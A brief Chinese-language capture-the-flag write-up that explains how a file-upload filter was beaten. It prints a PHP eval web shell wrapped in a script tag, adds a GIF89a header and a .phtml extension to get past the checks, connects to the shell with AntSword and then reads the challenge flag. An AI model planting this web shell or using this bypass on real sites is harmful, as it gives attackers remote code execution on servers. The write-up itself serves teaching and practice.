文件上传,我们直接上传php一句话木马,
后缀名jpg 然后报错:如下图
因为我们包含了<?
看来我们想的还是太简单了。
于是我们插入script代码,语言类型为php。进行绕过
<script language="php">eval($_POST['hacker']);</script>
然后我们继续上传,发现又报错
是jpg格式,但是还是报错,说不要欺骗它,这样我们想到了在前面加上GIF89a可以进行绕过。
我们上传发现可以上传,但是我们上传图片没有用,我们可以后缀名改为phtml,这是偷瞄大佬博客上了解到的。
phtml是php2的一个标准扩展名。为了能上传一句胡木马,我们可以这样进行绕过。
然后,我们再上传,发现我们上传成功
然后,一般上传文件的地方,有一个文件夹叫upload,于是我们猜测是upload,然后跟上文件名,我们用中国蚁剑连接,密码是一句话木马里面的密码
连接成功,我们去寻找flag。我们发现flag在根目录下,然后打开,获得
flag{fe430e89-f584-469f-b142-74b6124a53a3}